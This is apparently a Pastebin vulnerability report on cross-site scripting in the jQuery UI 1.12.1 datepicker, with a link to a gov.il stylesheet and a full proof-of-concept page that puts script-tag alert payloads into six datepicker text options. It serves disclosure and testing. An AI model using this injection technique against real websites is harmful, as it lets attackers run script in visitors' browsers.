Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- https://www.gov.il/Content/Ver_3/GeneralStyle?v=mGX5UPW5WKaLw05wiEkpbwRmFZYDvlBVJ1dB36eT8hs1
- jQuery UI - v1.12.1 - 2016-09-14
- * http://jqueryui.com
- * Includes: core.css, accordion.css, autocomplete.css, menu.css, button.css, controlgroup.css, checkboxradio.css, datepicker.css, dialog.css, draggable.css, resizable.css, progressbar.css, selectable.css, selectmenu.css, slider.css, sortable.css, spinner.css, tabs.css, tooltip.css, theme.css
- XSS Vulnerability on text options of jQuery UI datepicker
- Description
- similar to https://github.com/jquery/api.jqueryui.com/issues/281 but applies to the datepicker
- to recreate
- Create a new HTML page.
- Inject this content into new page:
- <!DOCTYPE html>
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <title>XSS in options of datepicker</title>
- <script src="https://code.jquery.com/jquery-3.3.1.js"></script>
- <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
- <link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
- <script>
- $(document).ready(function () {
- $( "#datepicker" ).datepicker({
- showButtonPanel: true,
- showOn: "both",
- closeText: '<script>alert("closeText XSS")<\/script>',
- currentText: '<script>alert("currentText XSS")<\/script>',
- prevText: '<script>alert("prevText XSS")<\/script>',
- nextText: '<script>alert("nextText XSS")<\/script>',
- buttonText: '<script>alert("buttonText XSS")<\/script>',
- appendText: '<script>alert("appendText XSS")<\/script>'
- });
- });
- </script>
- </head>
- <body>
- <p>Date: <input type="text" id="datepicker"></p>
- </body>
- </html>
- on load, alerts are shown for appendText & buttonText
- after clicking the input control, alerts are shown for closeText, currentText, prevText & nextText
- The scripted alerts should not be shown - an attacker can take advantage of injecting malicious XSS content into website.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement